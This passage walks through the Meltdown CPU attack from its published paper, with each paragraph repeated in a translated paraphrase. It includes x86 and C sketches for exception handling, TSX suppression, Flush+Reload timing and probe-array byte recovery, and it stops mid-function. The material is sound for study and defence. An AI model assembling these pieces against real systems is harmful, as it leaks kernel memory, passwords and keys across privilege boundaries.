In the previous section, we used a simple example to show that a side effect of out-of-order execution, the modification of microarchitectural state, can cause information leakage. Through the code snippet, we saw the value of the data variable being passed into a cache side channel. Next, we detail how this technique can be used to leak protected data. In this section, we outline and discuss the building blocks required to exploit out-of-order execution for an attack.
The adversary targets a secret value that is kept somewhere in physical memory. Note that register contents are also stored in memory upon context switches, i.e., they are also stored in physical memory. As described in Section 2.2, the address space of every process typically includes the entire user space, as well as the entire kernel space, which typically also has all physical memory (in use) mapped. However, these memory regions are only accessible in privileged mode (cf. Section 2.2).
The attacker's target is a secret value stored in physical memory. Note: register values are also saved to physical memory on context switches. As described in Section 2.2, the address space of each process usually includes the entire user address space as well as the entire kernel address space (into which all in-use physical memory is mapped). Although the process can see that the kernel-space mapping exists, those memory regions can only be accessed in privileged mode (cf. Section 2.2).
In this work, we demonstrate leaking secrets by bypassing the privileged-mode isolation, giving an attacker full read access to the entire kernel space including any physical memory mapped, including the physical memory of any other process and the kernel. Note that Kocher et al. [19] pursue an orthogonal approach, called Spectre Attacks, which trick speculative executed instructions into leaking information that the victim process is authorized to access. As a result, Spectre Attacks lack the privilege escalation aspect of Meltdown and require tailoring to the victim process’s software environment, but apply more broadly to CPUs that support speculative execution and are not stopped by KAISER.
In this work, we bypass the address-space isolation mechanism, giving the attacker full read access to the entire kernel space, including the direct-physical-map region. Through the direct map, an attacker can access the physical memory of any other process and of the kernel. Note: Kocher et al. [19] pursue a method called the Spectre attack, which leaks secret information of a target process via speculative execution. Spectre attacks therefore do not involve the privilege escalation of Meltdown, and they must be tailored to the target process's software environment. However, Spectre affects more CPUs (any CPU that supports speculative execution), and KAISER cannot block Spectre attacks.
The full Meltdown attack consists of two building blocks, as illustrated in Figure 5. The first building block of Meltdown is to make the CPU execute one or more instructions that would never occur in the executed path. In the toy example (cf. Section 3), this is an access to an array, which would normally never be executed, as the previous instruction always raises an exception. We call such an instruction, which is executed out of order, leaving measurable side effects, a transient instruction. Furthermore, we call any sequence of instructions containing at least one transient instruction a transient instruction sequence.
[Figure 5: The Meltdown attack consists of two building blocks: a transient instruction sequence that acts as the sender of a microarchitectural covert channel, and a receiver that recovers the secret from the microarchitectural state.]
A complete Meltdown attack consists of two building blocks, as shown in Figure 5. The first building block is to make the CPU execute one or more instructions that would never be executed on the normal path. In the toy example of Section 3, the access to the array would normally never execute, because the preceding instruction always raises an exception. We call such an instruction a transient instruction: it is executed by the CPU during out-of-order execution (it would not execute under normal circumstances) and leaves measurable side effects. Furthermore, we call any instruction sequence containing at least one transient instruction a transient instruction sequence.
In order to leverage transient instructions for an attack, the transient instruction sequence must utilize a secret value that an attacker wants to leak. Section 4.1 describes building blocks to run a transient instruction sequence with a dependency on a secret value.
To complete the attack, the transient instruction sequence must access the secret value the attacker wants to obtain and exploit. Section 4.1 takes a closer look at how such an instruction sequence makes use of protected data.
The second building block of Meltdown is to transfer the microarchitectural side effect of the transient instruction sequence to an architectural state to further process the leaked secret. Thus, Section 4.2 describes building blocks to transfer a microarchitectural side effect to an architectural state using a covert channel.
Meltdown's second building block detects the side effects left on the CPU microarchitecture after the transient instruction sequence has executed, and converts them into architectural state that software can perceive, thereby leaking the data. Accordingly, the second building block described in Section 4.2 uses a covert channel to turn the CPU's microarchitectural side effects into architectural state.

4.1 Executing Transient Instructions

The first building block of Meltdown is the execution of transient instructions. Transient instructions basically occur all the time, as the CPU continuously runs ahead of the current instruction to minimize the experienced latency and thus maximize the performance (cf. Section 2.1). Transient instructions introduce an exploitable side channel if their operation depends on a secret value. We focus on addresses that are mapped within the attacker's process, i.e., the user-accessible user space addresses as well as the user-inaccessible kernel space addresses. Note that attacks targeting code that is executed within the context (i.e., address space) of another process are possible [19], but out of scope in this work, since all physical memory (including the memory of other processes) can be read through the kernel address space anyway.
Meltdown's first building block is the execution of transient instructions. In fact, transient instructions occur all the time: in addition to the current instruction, the CPU often executes the instructions that follow it ahead of time to maximize performance (see Section 2.1). If a transient instruction's execution depends on a protected value, it introduces an exploitable side channel. Note also that this paper focuses on the attacker's own process address space, that is, the attacker in user mode accessing protected data at kernel-space addresses. Attacks that steal data from the address space of another process are also possible [19] (though this paper does not describe that scenario); after all, the attacker's process can reach all of the system's physical memory through the kernel address space, and other processes' data lives somewhere in that physical memory.
Accessing user-inaccessible pages, such as kernel pages, triggers an exception which generally terminates the application. If the attacker targets a secret at a user-inaccessible address, the attacker has to cope with this exception. We propose two approaches: with exception handling, we catch the exception effectively occurring after executing the transient instruction sequence, and with exception suppression, we prevent the exception from occurring at all and instead redirect the control flow after executing the transient instruction sequence. We discuss these approaches in detail in the following.
Accessing a privileged page, such as a kernel page, from user mode triggers an exception that usually terminates the application. If the attacker's target is data held at a kernel-space address, the attacker must cope with this exception. We propose two methods. The first installs an exception handler that is invoked when the exception occurs (by which time the transient instruction sequence has already executed). The second suppresses the exception from being raised at all. We discuss both methods in detail below.
Exception handling. A trivial approach is to fork the attacking application before accessing the invalid memory location that terminates the process, and only access the invalid memory location in the child process. The CPU executes the transient instruction sequence in the child process before crashing. The parent process can then recover the secret by observing the microarchitectural state, e.g., through a side-channel.
A simple method is to fork before accessing the kernel address (the access that triggers the exception and terminates the program), and to perform the faulting access only in the child process. Before the child process crashes, the CPU has already executed the transient instruction sequence. The parent process can then steal the kernel-space data by observing the CPU's microarchitectural state.
It is also possible to install a signal handler that will be executed if a certain exception occurs, in this specific case a segmentation fault. This allows the attacker to issue the instruction sequence and prevent the application from crashing, reducing the overhead as no new process has to be created.
Of course, one can also install a signal handler that is executed after the exception fires (in this scenario, a segmentation fault). The advantage of this method is that the application does not crash and no new process has to be created, so the overhead is relatively small.
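A minimal sketch of the signal-handler variant, assuming POSIX signals; in a real attack, the transient sequence and the Flush+Reload recovery fill in the two branches.

```c
#include <setjmp.h>
#include <signal.h>

/* Catch SIGSEGV so the faulting access does not kill the process, then
 * resume execution at a recovery point. */
static sigjmp_buf recovery_point;

static void segv_handler(int sig) {
    (void)sig;
    siglongjmp(recovery_point, 1);   /* jump back instead of crashing */
}

void attempt_read(void) {
    signal(SIGSEGV, segv_handler);
    if (sigsetjmp(recovery_point, 1) == 0) {
        /* transient instruction sequence goes here: the faulting kernel
         * read followed by the dependent probe_array access */
    } else {
        /* SIGSEGV was delivered; recover the secret via Flush+Reload */
    }
}
```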
Exception suppression. This method relies on transactional memory (Intel TSX); interested readers are referred to the original paper for the details.
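For completeness, here is a sketch of the TSX-based suppression just mentioned, assuming a CPU with RTM support (compile with -mrtm); kernel_ptr and probe_array are the same hypothetical names as before, and this is an illustration rather than the paper's code.

```c
#include <stdint.h>
#include <immintrin.h>   /* _xbegin, _xend, _XBEGIN_STARTED */

/* A faulting access inside a TSX transaction aborts the transaction instead
 * of delivering a signal, while the transient cache footprint survives. */
void attempt_read_tsx(volatile uint8_t *kernel_ptr, uint8_t *probe_array) {
    if (_xbegin() == _XBEGIN_STARTED) {
        uint8_t secret = *kernel_ptr;                       /* faults, aborting the txn */
        volatile uint8_t tmp = probe_array[secret * 4096];  /* transient probe */
        (void)tmp;
        _xend();                                            /* not reached on abort */
    }
    /* The transaction aborted silently; proceed to Flush+Reload the pages. */
}
```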

4.2 Building a Covert Channel

The second building block of Meltdown is the transfer of the microarchitectural state, which was changed by the transient instruction sequence, into an architectural state (cf. Figure 5). The transient instruction sequence can be seen as the sending end of a microarchitectural covert channel. The receiving end of the covert channel receives the microarchitectural state change and deduces the secret from the state. Note that the receiver is not part of the transient instruction sequence and can be a different thread or even a different process, e.g., the parent process in the fork-and-crash approach.
Meltdown's second building block converts the change in CPU microarchitectural state caused by executing the transient instruction sequence into a corresponding architectural state (see Figure 5). The transient instruction sequence can be regarded as the sender of a microarchitectural covert channel; the channel's receiver observes the microarchitectural state change and deduces the protected data from it. Note that the receiver is not part of the transient instruction sequence and can be a different thread or even a different process. For example, in the fork example of the previous section, the transient instruction sequence runs in the child process and the receiver in the parent process.
We leverage techniques from cache attacks, as the cache state is a microarchitectural state which can be reliably transferred into an architectural state using various techniques [28, 35, 10]. Specifically, we use Flush+Reload [35], as it allows to build a fast and low-noise covert channel. Thus, depending on the secret value, the transient instruction sequence (cf. Section 4.1) performs a regular memory access, eg, as it does in the toy example (cf. Section 3).
We can take advantage of cache attack techniques: by detecting the state of the cache (one of the microarchitectural states), we can reliably convert it into architectural state using various techniques [28, 35, 10]. Specifically, we use Flush+Reload [35], since it allows building a fast, low-noise covert channel. Depending on the secret value, the transient instruction sequence (cf. Section 4.1) then performs a regular memory access, just as in the toy example of Section 3.
After the transient instruction sequence accessed an accessible address, i.e., this is the sender of the covert channel, the address is cached for subsequent accesses. The receiver can then monitor whether the address has been loaded into the cache by measuring the access time to the address. Thus, the sender can transmit a '1'-bit by accessing an address which is loaded into the monitored cache, and a '0'-bit by not accessing such an address.
At the sending end of the covert channel, the transient instruction sequence accesses a normal memory address, causing the data at that address to be loaded into the cache (to speed up subsequent accesses). The receiving end can then determine whether the data has been loaded into the cache by measuring the access time of that memory address. Therefore, the sender transmits a '1' bit by accessing the memory address (which loads it into the cache), and a '0' bit by not accessing it (leaving it uncached). The receiving end recovers the bit by monitoring the cache state.
Using multiple different cache lines, as in our toy example in Section 3, allows transmitting multiple bits at once. For each of the 256 different byte values, the sender accesses a different cache line. By performing a Flush+Reload attack on all of the 256 possible cache lines, the receiver can recover a full byte instead of just one bit. However, since the Flush+Reload attack takes much longer (typically several hundred cycles) than the transient instruction sequence, transmitting only a single bit at once is more efficient. The attacker can simply do that by shifting and masking the secret value accordingly.
One bit can be transferred using one cache line, and multiple bits can be transferred simultaneously if multiple different cache lines are used (as in the simple example code of Section 3). A byte (8 bits) has 256 possible values. For each value, the sender accesses a different cache line, so by performing a Flush+Reload attack on all 256 possible cache lines, the receiver can recover a complete byte instead of a single bit. However, since a Flush+Reload attack takes much longer than executing the transient instruction sequence (typically several hundred cycles), it is more efficient to transmit only one bit at a time. The attacker can use shifts and masks to extract the secret data bit by bit.
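As a minimal sketch of the Flush+Reload primitive used here (x86 with GCC/Clang intrinsics; the hit threshold is an assumption that must be calibrated per machine):

    #include <stdint.h>
    #include <immintrin.h>  /* _mm_clflush, _mm_mfence, __rdtscp */

    #define CACHE_HIT_THRESHOLD 120  /* illustrative; calibrate on the target CPU */

    /* Flush phase: evict the probed address from the whole cache hierarchy. */
    static inline void flush(const void *addr)
    {
        _mm_clflush(addr);
        _mm_mfence();
    }

    /* Reload phase: time one load; a fast load means the sender touched it. */
    static inline int reload_is_hit(const volatile uint8_t *addr)
    {
        unsigned int aux;
        uint64_t t0 = __rdtscp(&aux);
        (void)*addr;
        uint64_t t1 = __rdtscp(&aux);
        return (t1 - t0) < CACHE_HIT_THRESHOLD;  /* 1 = cache hit, 0 = miss */
    }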
Note that the covert channel is not limited to microarchitectural states which rely on the cache. Any microarchitectural state which can be influenced by an instruction (sequence) and is observable through a side channel can be used to build the sending end of a covert channel. The sender could, for example, issue an instruction (sequence) which occupies a certain execution port such as the ALU to send a ‘1’-bit. The receiver measures the latency when executing an instruction (sequence) on the same execution port. A high latency implies that the sender sends a ‘1’-bit, whereas a low latency implies that the sender sends a ‘0’-bit. The advantage of the Flush+Reload cache covert channel is the noise resistance and the high transmission rate [10]. Furthermore, the leakage can be observed from any CPU core [35], i.e., rescheduling events do not significantly affect the covert channel.
A word of caution: covert channels do not always rely on caching. As long as the CPU microarchitectural state is affected by transient instruction sequences, and this state change can be observed through the side channel, then the microarchitectural state can be used to construct the sender of the covert channel. For example, the sending end can execute an instruction (the instruction will occupy the port of the relevant execution unit (such as ALU)) to send a "1" bit. The receiving end can execute instructions on the same execution unit port while measuring the time delay. High latency means the sender sends a "1" bit, and low latency means the sender sends a "0" bit. The advantage of Flush+Reload covert channel is noise immunity and high transmission rate [10]. Furthermore, we can observe data leakage [35] from any CPU core, i.e. scheduling events do not significantly affect the covert channel.

5. Meltdown

In this section, we present Meltdown, a powerful attack allowing to read arbitrary physical memory from an unprivileged user program, comprised of the building blocks presented in Section 4. First, we discuss the attack setting to emphasize the wide applicability of this attack. Second, we present an attack overview, showing how Meltdown can be mounted on both Windows and Linux on personal computers as well as in the cloud. Finally, we discuss a concrete implementation of Meltdown allowing to dump kernel memory with up to 503 KB/s.
In this chapter, we show the power of Meltdown: reading physical memory anywhere in the system from an ordinary user program, built from the building blocks described in Chapter 4. First, we discuss the attack setting; from it we can see that the Meltdown attack has a very wide range of applicability. Second, we give an overview of the Meltdown attack and show how it works against Windows and Linux PCs as well as cloud servers. Finally, we discuss a concrete implementation of Meltdown that can dump kernel memory at up to 503 KB/s.
Attack setting.
In our attack, we consider personal computers and virtual machines in the cloud. In the attack scenario, the attacker has arbitrary unprivileged code execution on the attacked system, i.e., the attacker can run any code with the privileges of a normal user. However, the attacker has no physical access to the machine. Further, we assume that the system is fully protected with state-of-the-art software-based defenses such as ASLR and KASLR as well as CPU features like SMAP, SMEP, NX, and PXN. Most importantly, we assume a completely bug-free operating system, thus, no software vulnerability exists that can be exploited to gain kernel privileges or leak information. The attacker targets secret user data, e.g., passwords and private keys, or any other valuable information.
The attack setting is as follows:
We consider two scenarios: personal computers, and virtual machines on cloud servers. In the attack, the attacker can only run unprivileged code on the target system, that is, code with the privileges of an ordinary user. Also, the attacker has no physical access to the machine. Further, we assume that the target system already has state-of-the-art software-based defenses such as ASLR and KASLR, and that the CPU provides features such as SMAP, SMEP, NX, and PXN. Most importantly, we assume a completely bug-free operating system, with no software vulnerability that can be exploited to gain kernel privileges or leak information. The attacker targets the user's secret data, such as passwords and private keys, or any other valuable information.

5.1 Overview

Meltdown combines the two building blocks discussed in Section 4. First, an attacker makes the CPU execute a transient instruction sequence which uses an inaccessible secret value stored somewhere in physical memory (cf. Section 4.1). The transient instruction sequence acts as the transmitter of a covert channel (cf. Section 4.2), ultimately leaking the secret value to the attacker.
Meltdown combines the two building blocks discussed in Section 4. First, the attacker makes the CPU execute a transient instruction sequence that operates on inaccessible secret data stored somewhere in physical memory (see Section 4.1). The transient instruction sequence acts as the sender of a covert channel (see Section 4.2), ultimately leaking the secret data to the attacker.
Meltdown consists of 3 steps:
Step 1 The content of an attacker-chosen memory location, which is inaccessible to the attacker, is loaded into a register.
Step 2 A transient instruction accesses a cache line based on the secret content of the register.
Step 3 The attacker uses Flush+Reload to determine the accessed cache line and hence the secret stored at the chosen memory location.
By repeating these steps for different memory locations, the attacker can dump the kernel memory, including the entire physical memory.
The Meltdown attack consists of 3 steps:
Step 1: The attacker accesses the memory location holding the secret data (memory the attacker has no permission to access) and loads its content into a register.
Step 2: A transient instruction accesses a cache line based on the secret content of the register.
Step 3: The attacker uses Flush+Reload to determine which cache line was accessed in step 2, and thereby recovers the secret data read in step 1.
By repeating these steps for different memory addresses, the attacker can dump the entire kernel address space, which includes the entire physical memory.
Listing 2 shows the basic implementation of the transient instruction sequence and the sending part of the covert channel, using x86 assembly instructions. Note that this part of the attack could also be implemented entirely in higher-level languages like C. In the following, we will discuss each step of Meltdown and the corresponding code line in Listing 2.
Listing 2: The core instruction sequence of Meltdown (x86 assembly).
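As given in the original paper, the listing is (line numbers kept, since the discussion below refers to them):

    1 ; rcx = kernel address, rbx = probe array
    2 xor rax, rax
    3 retry:
    4 mov al, byte [rcx]
    5 shl rax, 0xc
    6 jz retry
    7 mov rbx, qword [rbx + rax]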
The listing above shows the transient instruction sequence and the basic implementation of the sending part of the covert channel (using x86 assembly instructions). It should be noted that this part of the attack could also be implemented entirely in a high-level language such as C. In the following, we discuss how each line of code in the listing accomplishes the Meltdown attack.
Step 1: Reading the secret. To load data from the main memory into a register, the data in the main memory is referenced using a virtual address. In parallel to translating a virtual address into a physical address, the CPU also checks the permission bits of the virtual address, i.e., whether this virtual address is user accessible or only accessible by the kernel. As already discussed in Section 2.2, this hardware-based isolation through a permission bit is considered secure and recommended by the hardware vendors. Hence, modern operating systems always map the entire kernel into the virtual address space of every user process.
Step 1: Read the secret data in memory. To load data from main memory into registers, we use virtual addresses to access data in main memory. While translating the virtual address to a physical address, the CPU also checks the permission bits of the virtual address: whether this virtual address is accessible from user mode, or only from kernel mode. As already discussed in Section 2.2, this hardware-based address space isolation is considered secure and is recommended by hardware vendors. Therefore, modern operating systems always map the entire kernel address space into the virtual address space of each user process.
As a consequence, all kernel addresses lead to a valid physical address when translating them, and the CPU can access the content of such addresses. The only difference to accessing a user space address is that the CPU raises an exception as the current permission level does not allow to access such an address. Hence, the user space cannot simply read the contents of such an address. However, Meltdown exploits the out-of-order execution of modern CPUs, which still executes instructions in the small time window between the illegal memory access and the raising of the exception.
When accessing the kernel address space, as long as the virtual address mapping is created (that is, a valid physical address can be translated through the page table), the CPU can access the contents of these addresses. The only difference from accessing the user address space is that a permission check will be performed, and an exception will be triggered when accessing a kernel space address because the current CPU permission level is not enough. Therefore, user space cannot obtain secret data simply by reading the contents of a kernel address. However, the nature of out-of-order execution allows the CPU to continue executing instructions within a small time window (from executing an illegal memory access instruction to triggering an exception). Meltdown uses the out-of-order execution feature to complete the attack.
In line 4 of Listing 2, we load the byte value located at the target kernel address, stored in the RCX register, into the least significant byte of the RAX register represented by AL. As explained in more detail in Section 2.1, the MOV instruction is fetched by the core, decoded into μOPs, allocated, and sent to the reorder buffer. There, architectural registers (e.g., RAX and RCX in Listing 2) are mapped to underlying physical registers enabling out-of-order execution. Trying to utilize the pipeline as much as possible, subsequent instructions (lines 5-7) are already decoded and allocated as μOPs as well. The μOPs are further sent to the reservation station holding the μOPs while they wait to be executed by the corresponding execution unit. The execution of a μOP can be delayed if execution units are already used to their corresponding capacity or operand values have not been calculated yet.
In line 4 of the listing above, we access memory located in the kernel address space (the address is stored in the RCX register), fetch one byte, and store it in the AL register (the lowest 8 bits of the RAX register). As described in Section 2.1, the MOV instruction is fetched by the CPU core, decoded into μOPs, allocated, and sent to the reorder buffer. There, architectural registers (software-visible registers such as RAX and RCX) are mapped to the underlying physical registers to enable out-of-order execution. To exploit the pipeline as much as possible, the subsequent instructions (lines 5-7) are also already decoded and allocated as μOPs. The μOPs are then sent to the reservation station, which holds them while they wait to be executed by the corresponding execution unit. A μOP is delayed if the execution units are already used to capacity (for example, with 3 adders, 3 additions can execute simultaneously and a fourth must wait) or if the values of its operands have not been calculated yet.
When the kernel address is loaded in line 4, it is likely that the CPU already issued the subsequent instructions as part of the out-of-order execution, and that their corresponding μOPs wait in the reservation station for the content of the kernel address to arrive. As soon as the fetched data is observed on the common data bus, the μOPs can begin their execution.
When loading the kernel address into the register in line 4 of the program, due to out-of-order execution, it is likely that the CPU has already issued subsequent instructions, and their corresponding μOPs will wait in the reservation station for the contents of the kernel address to arrive. These μOPs begin execution as soon as the fetched core address data is observed on the common data bus.
When the μOPs finish their execution, they retire in order, and, thus, their results are committed to the architectural state. During the retirement, any interrupts and exceptions that occurred during the execution of the instruction are handled. Thus, if the MOV instruction that loads the kernel address is retired, the exception is registered and the pipeline is flushed to eliminate all results of subsequent instructions which were executed out of order. However, there is a race condition between raising this exception and our attack step 2, which we describe below.
When the μOPs finish executing, they retire in order (retire here has essentially the same meaning as commit), and their results are committed to the architectural state. During retirement, any interrupts and exceptions that occurred during the execution of the instruction are handled. Therefore, when the MOV instruction retires, the CPU notices that the instruction accessed a kernel address and raises an exception. At this point the pipeline is flushed, and the results of the instructions after the MOV that were executed early due to out-of-order execution are discarded. However, there is a race condition between raising this exception and our attack step 2, which we describe below.
As reported by Gruss et al. [9], prefetching kernel addresses sometimes succeeds. We found that prefetching the kernel address can slightly improve the performance of the attack on some systems.
According to the research of Gruss et al. [9], prefetching a kernel address sometimes succeeds. We found that prefetching kernel addresses can slightly improve attack performance on some systems.
Step 2: Transmitting the secret. The instruction sequence from step 1 which is executed out of order has to be chosen in a way that it becomes a transient instruction sequence. If this transient instruction sequence is executed before the MOV instruction is retired (i.e., raises the exception), and the transient instruction sequence performed computations based on the secret, it can be utilized to transmit the secret to the attacker.
Step 2: Transmit the secret data.
The out-of-order instruction sequence from step 1 only becomes a transient instruction sequence under certain conditions: it must be executed before the MOV instruction retires (that is, before the exception is triggered), and it must perform computations based on the secret data; the side effects of these computations can then be used to pass the secret data to the attacker.
As already discussed, we utilize cache attacks that allow building a fast and low-noise covert channel using the CPU's cache. Thus, the transient instruction sequence has to encode the secret into the microarchitectural cache state, similarly to the toy example in Section 3.
As already discussed, we exploit cache attacks, which utilize the CPU's cache memory to establish a fast and low-noise covert channel. Then, the transient instruction sequence must encode the secret data in the microarchitectural cache state. This process is similar to the simple example program in Section 3.
We allocate a probe array in memory and ensure that no part of this array is cached. To transmit the secret, the transient instruction sequence contains an indirect memory access to an address which is calculated based on the secret (inaccessible) value. In line 5 of Listing 2 the secret value from step 1 is multiplied by the page size, i.e., 4 KB. The multiplication of the secret ensures that accesses to the array have a large spatial distance to each other. This prevents the hardware prefetcher from loading adjacent memory locations into the cache as well. Here, we read a single byte at once, hence our probe array is 256×4096 bytes, assuming 4KB pages.
We allocate a probe array in memory and make sure that no part of the array is cached. To transmit the secret data, the transient instruction sequence contains an indirect memory access into the probe array based on that secret data (which is inaccessible to userland). See line 5 of the listing above: the secret byte obtained in step 1 is multiplied by the page size, i.e., 4 KB (the code uses a shift operation, which has the same effect). This multiplication ensures that accesses to the array have a large spatial distance from each other, preventing the hardware prefetcher from loading adjacent memory locations into the cache. Since only one byte is read at a time, our probe array is 256 x 4096 bytes (assuming a 4 KB page size).
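A sketch of how such a probe array might be set up (Linux, illustrative: one page per possible byte value, each page backed and then flushed so that no probe line starts out cached):

    #include <stdint.h>
    #include <sys/mman.h>
    #include <immintrin.h>

    #define PAGE_SIZE   4096
    #define PROBE_PAGES 256   /* one page per possible byte value */

    static uint8_t *alloc_probe_array(void)
    {
        uint8_t *probe = mmap(NULL, PROBE_PAGES * PAGE_SIZE,
                              PROT_READ | PROT_WRITE,
                              MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (probe == MAP_FAILED)
            return NULL;
        for (int i = 0; i < PROBE_PAGES; i++)
            probe[i * PAGE_SIZE] = 1;            /* back every page with memory */
        for (int i = 0; i < PROBE_PAGES; i++)
            _mm_clflush(&probe[i * PAGE_SIZE]);  /* ensure no probe line is cached */
        return probe;
    }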
Note that in the out-of-order execution we have a noise-bias towards register value ‘0’. We discuss the reasons for this in Section 5.2. However, for this reason, we introduce a retry-logic into the transient instruction sequence. In case we read a ‘0’, we try to read the secret again (step 1). In line 7, the multiplied secret is added to the base address of the probe array, forming the target address of the covert channel. This address is read to cache the corresponding cache line. Consequently, our transient instruction sequence affects the cache state based on the secret value that was read in step 1.
Note: in out-of-order execution, there is a noise bias towards the register value "0"; the specific reasons are discussed in Section 5.2. For this reason, retry logic is introduced into the transient instruction sequence: if a "0" is read, we try to re-read the secret data (step 1). In line 7 of the code, the secret data multiplied by 4096 is added to the base address of the probe array, forming the target address of the covert channel. Reading this target address loads the data into the corresponding cache line. Therefore, the transient instruction sequence modifies the cache state of the probe array according to the secret data read in step 1.
Since the transient instruction sequence in step 2 races against raising the exception, reducing the runtime of step 2 can significantly improve the performance of the attack. For instance, taking care that the address translation for the probe array is cached in the TLB increases the attack performance on some systems.
Since the transient instruction sequence in step 2 needs to race against the triggering of the exception, reducing the running time of step 2 can significantly improve the performance of the attack. For example, making sure the address translation for the probe array is already cached in the TLB improves attack performance on some systems.
Step 3: Receiving the secret. In step 3, the attacker recovers the secret value (step 1) by leveraging a microarchitectural side-channel attack (i.e., the receiving end of a microarchitectural covert channel) that transfers the cache state (step 2) back into an architectural state. As discussed in Section 4.2, Meltdown relies on Flush+Reload to transfer the cache state into an architectural state.
Step 3: Receive secret data.
In step 3, the attacker uses a microarchitecture side-channel attack (that is, the receiving end of the microarchitecture covert channel) to convert the cache state into an architectural state that software can perceive, thereby recovering the secret data. As discussed in Section 4.2, meltdown relies on Flush+Reload to convert cache state to CPU architectural state.
When the transient instruction sequence of step 2 is executed, exactly one cache line of the probe array is cached. The position of the cached cache line within the probe array depends only on the secret which is read in step 1. Thus, the attacker iterates over all 256 pages of the probe array and measures the access time for the first cache line (i.e., offset) of every page. The number of the page containing the cached cache line corresponds directly to the secret value.
During the execution of the transient instruction sequence in step 2, only one cache line of the entire probe array is loaded. The position of the loaded cache line in the probe array depends only on the secret data read in step 1. Therefore, the attacker traverses all 256 pages of the probe array and measures the access time of the first cache line of each page. The index of the page whose cache line was preloaded corresponds directly to the value of the secret data.
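Continuing the Flush+Reload sketch from Section 4.2, the receiver's scan could look like this (illustrative; reload_is_hit() is the timing helper from that sketch):

    /* Scan all 256 probe pages; the index of the (single) cached page is
       the leaked byte. Returns 0 when nothing hits (the zero case, cf. 5.2). */
    static int recover_byte(volatile uint8_t *probe)
    {
        for (int value = 0; value < 256; value++) {
            if (reload_is_hit(&probe[value * 4096]))
                return value;
        }
        return 0;  /* no cache hit at all: assume the secret byte was 0 */
    }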
Dumping the entire physical memory. By repeating all 3 steps of Meltdown, the attacker can dump the entire memory by iterating over all different addresses. However, as the memory access to the kernel address raises an exception that terminates the program, we use one of the methods described in Section 4.1 to handle or suppress the exception.
Dump the entire physical memory:
By repeating the above 3 steps while varying the attacked address, the attacker can dump the entire memory. However, since a memory access to a kernel address raises an exception that terminates the program, we use one of the methods described in Section 4.1 to handle or suppress the exception.
As all major operating systems also typically map the entire physical memory into the kernel address space (cf. Section 2.2) in every user process, Meltdown is not only limited to reading kernel memory but it is capable of reading the entire physical memory of the target machine.
In all current mainstream operating systems, the entire physical memory is usually mapped into the kernel address space (see Section 2.2), which is present in every user process. Therefore, Meltdown can not only read the memory of the kernel address space, but also read the entire physical memory of the target machine.

5.2 Optimizations and limitations

The case of 0. If the exception is triggered while trying to read from an inaccessible kernel address, the register where the data should be stored, appears to be zeroed out. This is reasonable because if the exception is unhandled, the user space application is terminated, and the value from the inaccessible kernel address could be observed in the register contents stored in the core dump of the crashed process. The direct solution to fix this problem is to zero out the corresponding registers. If the zeroing out of the register is faster than the execution of the subsequent instruction (line 5 in Listing 2), the attacker may read a false value in the third step. To prevent the transient instruction sequence from continuing with a wrong value, i.e., ‘0’, Meltdown retries reading the address until it encounters a value different from ‘0’ (line 6). As the transient instruction sequence terminates after the exception is raised, there is no cache access if the secret value is 0. Thus, Meltdown assumes that the secret value is indeed ‘0’ if there is no cache hit at all.
The scene where the reading value is 0.
According to the previous description, at instruction retirement, when a user-mode access to a kernel address is detected, besides raising an exception the CPU also discards the result of the instruction, i.e., the AL register is zeroed. If the transient instruction sequence loses the race with the exception (the register zeroing happens before line 5 of the listing above executes), then what is read is not the actual value at the kernel address but the zeroed value. Zeroing the register is reasonable: if the exception is not handled, the user-space application terminates, and the register contents stored in the core dump of the crashed process would otherwise reveal the value read from the inaccessible kernel address. Zeroing the register closes this leak and protects kernel-space data. To prevent the transient instruction sequence from continuing to operate on the wrong "0" value, Meltdown re-reads the address until it reads a non-zero value (line 6).
You may ask: what if the secret data really is 0? When the exception is triggered, execution of the transient instruction sequence terminates; if the secret data is indeed 0, no cache line is loaded. Therefore, during Meltdown's scan of the probe array, if no cache line hits at all, the secret data is assumed to be "0".
The loop is terminated by either the read value not being ‘0’ or by the raised exception of the invalid memory access. Note that this loop does not slow down the attack measurably, since, in either case, the processor runs ahead of the illegal memory access, regardless of whether ahead is a loop or ahead is a linear control flow. In either case, the time until the control flow returned from exception handling or exception suppression remains the same with and without this loop. Thus, capturing read ‘0’s beforehand and recovering early from a lost race condition vastly increases the reading speed.
The loop terminates either when a non-"0" value is read or when the invalid memory access raises the exception. Note that this loop does not measurably slow down the attack: in both cases, the CPU runs ahead of the illegal memory access, and it does not care whether "ahead" is a loop or a linear control flow. In either case, the time until control flow returns from exception handling (or exception suppression) is the same with or without the loop. Therefore, detecting a read "0" early, i.e., recovering early from a lost race, greatly increases the reading speed.
Single-bit transmission.
In the attack description in Section 5.1, the attacker transmitted 8 bits through the covert channel at once and performed 2^8 = 256 Flush+Reload measurements to recover the secret. However, there is a clear trade-off between running more transient instruction sequences and performing more Flush+Reload measurements. The attacker could transmit an arbitrary number of bits in a single transmission through the covert channel, by reading more bits using a MOV instruction for a larger data value. Furthermore, the attacker could mask bits using additional instructions in the transient instruction sequence. We found the number of additional instructions in the transient instruction sequence to have a negligible influence on the performance of the attack.
Single-bit transmission:
In the description of Section 5.1, the attacker transmits 8 bits at a time through the covert channel, and the receiving end performs 2^8 = 256 Flush+Reload measurements to recover the secret data. However, we need to strike a balance between running more transient instruction sequences and performing more Flush+Reload measurements. An attacker can send an arbitrary number of bits in one transmission through the covert channel; this requires using a MOV instruction that reads more bits of secret data. In addition, the attacker can add masking operations to the transient instruction sequence (so that fewer bits are transmitted, reducing the number of Flush+Reload measurements at the receiving end). We find that increasing the number of instructions in the transient instruction sequence has a negligible impact on the performance of the attack.
The performance bottleneck in the generic attack description above is indeed the time spent on Flush+Reload measurements. In fact, with this implementation, almost the entire time is spent on Flush+Reload measurements. By transmitting only a single bit, we can omit all but one Flush+Reload measurement, i.e., the measurement on cache line 1. If the transmitted bit was a '1', then we observe a cache hit on cache line 1. Otherwise, we observe no cache hit on cache line 1.
The performance bottleneck in the Meltdown attack described above is mainly the time spent on recovering secret data through Flush+Reload. In fact, in the Meltdown implementation of this chapter, almost all the time is spent on Flush+Reload. If only one bit is sent at a time, a single Flush+Reload measurement suffices: we only need to check the state of one cache line; a cache hit means the transmitted bit is "1", a cache miss means the transmitted bit is "0".
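A sketch of the single-bit variant (illustrative, reusing reload_is_hit() from the earlier sketch; the transient sequence masks out one bit, so the receiver needs only one measurement):

    /* Transient part (conceptual): access probe[((secret >> bit) & 1) * 4096],
       so only probe page 0 or page 1 can become cached.
       Receiver part: a single Flush+Reload measurement on page 1 suffices. */
    static int recover_bit(volatile uint8_t *probe)
    {
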